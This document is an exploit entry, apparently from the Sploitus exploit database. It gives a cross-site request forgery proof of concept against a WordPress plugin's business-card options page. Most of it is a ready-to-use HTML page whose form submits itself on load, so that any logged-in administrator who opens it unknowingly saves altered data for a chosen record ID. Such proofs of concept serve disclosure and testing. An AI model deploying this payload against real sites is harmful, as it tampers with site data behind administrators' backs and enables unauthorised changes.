## https://sploitus.com/exploit?id=WPEX-ID:18C1B3BB-9998-416F-A972-C4A51643579C
Make a logged in admin open an HTML document containing (where <<ID_TO_EDIT>> is a valid ID):
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=es-bcard-options&edit=<<ID_TO_EDIT>>" method="post">
<input type="hidden" name="img_data" value='0'>
<input type="hidden" name="edit" value="Save Changes">
<input type="submit" value="Submit" />
</form>
</body>
```